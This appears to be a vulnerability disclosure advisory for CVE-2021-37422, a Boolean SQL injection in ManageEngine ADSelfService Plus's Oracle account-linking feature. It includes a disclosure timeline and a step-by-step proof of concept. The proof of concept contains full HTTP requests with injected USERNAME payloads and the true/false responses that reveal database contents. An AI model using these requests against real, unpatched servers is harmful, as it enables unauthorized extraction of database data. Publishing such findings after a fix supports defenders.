Research & Development
$ #

CVE-2021-37422

SQL Injection in linked Oracle Database

7.7 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

ManageEngine ADSelfService Plus

< 6112

Krzysztof Andrusiak and Marcin Ogorzelski

Username provided for account linking with external Oracle Database is added into SQL query without sanitization. Such query is sent to linked Oracle Database, leading to Boolean SQL Injection attack (possible exfiltration of information stored in the database).

  1. Install Oracle Database and add it to Configured Applications in ADSSP (with Password Sync enabled).
  2. Log in to ADSSP as any domain user, then copy user's JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookie values from the browser.
  3. Send the following request to the server (replacing COOKIE_VALUE with valid cookies from previous step):
GET /ServletAPI/selfService/IAMApps/getIAMApps HTTP/1.1
Host: alpha-manage:8888
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=ff84ae2e-267f-4f17-bd7a-094c4b4c5bbc
  1. Copy APP_ID, HOST_NAME and APP_CONFIG_ID values from response body (from JSON entry related to Oracle Database).
  2. Send the following request to the server (replacing COOKIE_VALUE with valid cookies from step 2). Replace HOST_NAME, APP_CONFIG_ID and APP_ID values with ones retrieved in step 4.
POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=0%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.user_not_found"}
  1. Send the following request to the server (replacing COOKIE_VALUE with valid cookies from step 2). Replace HOST_NAME, APP_CONFIG_ID and APP_ID values with ones retrieved in step 4.
POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=1%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.invalid_password"}

As it can be seen, server returns different responses for true/false SQL queries, which makes possible to exfiltrate database data via Boolean SQL Injection attack.

  • 17-03-2021 - Vulnerability reported to vendor
  • 18-03-2021 - First response from vendor
  • 26-05-2021 - Additional questions received from vendor
  • 28-05-2021 - Response sent to vendor
  • 26-08-2021 - Fixed version release
  • 04-10-2023 - Public disclosure
  • 04-10-2023 - PoC release